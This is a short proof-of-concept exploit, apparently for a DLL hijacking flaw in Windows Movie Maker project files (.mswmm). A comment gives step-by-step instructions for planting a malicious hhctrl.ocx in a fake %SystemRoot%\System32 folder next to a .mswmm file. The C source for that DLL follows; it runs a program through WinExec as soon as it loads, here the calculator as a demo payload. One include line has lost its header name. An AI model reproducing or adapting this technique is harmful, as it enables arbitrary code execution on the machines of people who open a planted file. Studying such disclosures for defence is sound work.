所属类别 hhctrl.ocx
/* There is a way more interesting bug there in which the program tries to load a driver file. It's in investigation, but has a nice potential for a nastier vulnerability. 1. Create a file with the following extension: .mswmm 2. Compile this library and rename it to hhctrl.ocx 3. On the same directory of the .mswmm file, create a directory called: %SystemRoot% 4. Inside %SystemRoot%, create a directory called: System32 5. Move hhctrl.ocx into the System32 directory that you have just created 6. Open the .mswmm file and enjoy the fireworks */ #include #define DLLIMPORT __declspec (dllexport) int evil() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { evil(); return 0; }